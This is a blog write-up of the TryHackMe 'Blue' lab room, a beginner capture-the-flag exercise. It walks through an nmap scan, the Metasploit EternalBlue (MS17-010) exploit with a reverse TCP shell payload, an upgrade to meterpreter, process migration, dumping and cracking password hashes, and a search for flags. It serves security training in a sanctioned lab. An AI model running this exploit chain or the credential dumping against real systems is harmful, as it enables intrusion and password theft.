The Dutch Hacker
blue tryhackme write up

Blue on Tryhackme

This is the write up for the room Blue on Tryhackme and it is part of the complete beginners path

Make connection with VPN or use the attackbox on Tryhackme site to connect to the Tryhackme lab environment.

Tasks Blue

Task 1

1.1 Scan the machine. (If you are unsure how to tackle this, I recommend checking out the Nmap room

Type in the command:

nmap -T4 -p- MACHINE_IP
Ethernal blue

1.2 How many ports are open with a port number under 1000?

Answer 3

1.3 What is this machine vulnerable to? (Answer in the form of: ms??-???, ex: ms08-067)

Just google Ethernal blue and you will find the answer

Answer: MS17-010

Task 2

2.1 Start Metasploit by typing in the terminal


2.2 Find the exploitation code we will run against the machine. What is the full path of the code? (Ex: exploit/……..)

Type in the msfconsole

search ms17-010
Ethernal blue
Asnwer exploit/windows/smb/ms17_010_eternalblue

2.3 Show options and set the one required value. What is the name of this value? (All caps for submission)

You need to select it first then use the options

use 2 
Answer: RHOSTS

2.4 Run the exploit

Run the following command

set payload windows/x64/shell/reverse_tcp

and we need to set the LHOST to tun0 by typing in. This means we using the IP of the tunnel. So the IP tryhackme is giving us, If you are not on vpn then use your IP from the attackbox

Set LHOST tun0

Now type run or exploit

Confirm that the exploit has run correctly. You may have to press enter for the DOS shell to appear. Background this shell (CTRL + Z). If this failed, you may have to reboot the target VM. Try running it again before a reboot of the target. 

Ethernal blue

Now that we have a shell press CTRL +Z to push it to the background or type in background inside the shell

Ethernal blue

Task 3

3.1 If you haven’t already, background the previously gained shell (CTRL + Z). Research online how to convert a shell to meterpreter shell in metasploit. What is the name of the post module we will use? (Exact path, similar to the exploit we previously selected) 

Google shell_to_meterpreter

i have found this website that might help How to Upgrade Command Shell to Meterpreter (

Answer:  post/multi/manage/shell_to_meterpreter

3.2 Select this (use MODULE_PATH). Show options, what option are we required to change?

Ethernal blue

Type in sessions 2 to interact with it

Type in getuid to see what user we are


To list all the running processes type in ps


You can now migrate to a choosen process by typing migrate PROCESS_ID

I have migrated with the spoolsv.exe


Task 4

4.1 Within our elevated meterpreter shell, run the command ‘hashdump’. This will dump all of the passwords on the machine as long as we have the correct privileges to do so. What is the name of the non-default user? 

Because we migrated to the correct service we now have privileges to do the hashdump

Type in the command

Answer Jon

4.2 Copy this password hash to a file and research how to crack it. What is the cracked password?

Copy the last bit of the hash between the 3rd : and the 4th : then go to and put in that hash to get the password. It is that simple. If you want to crack it yourself you can do this with hashcat and the rockyou dictionary

The answer is the password you found

Task 5

5.1 Flag1? This flag can be found at the system root. 

Use the shell we still have and and look at the file on c:\

once found type in type <nameoffile>

So I see we need to find more flag. No problem just search for it with the following command

dir /s /p

All locations of the flags are now revealed and you should no. Remeber to look inside the file type in the following command

type <filename


I already did the exploit before with Metasploit on an HackTheBox machine called Blue. It is very good to get some skills with Metasploit and to start understand the basic. Overall it is a good room which you should not miss

Most Popular Post

Sign Up

Signup today for free and be the first to get notified on new updates.
* indicates required

Follow Me

Most Popular Post

Contact Us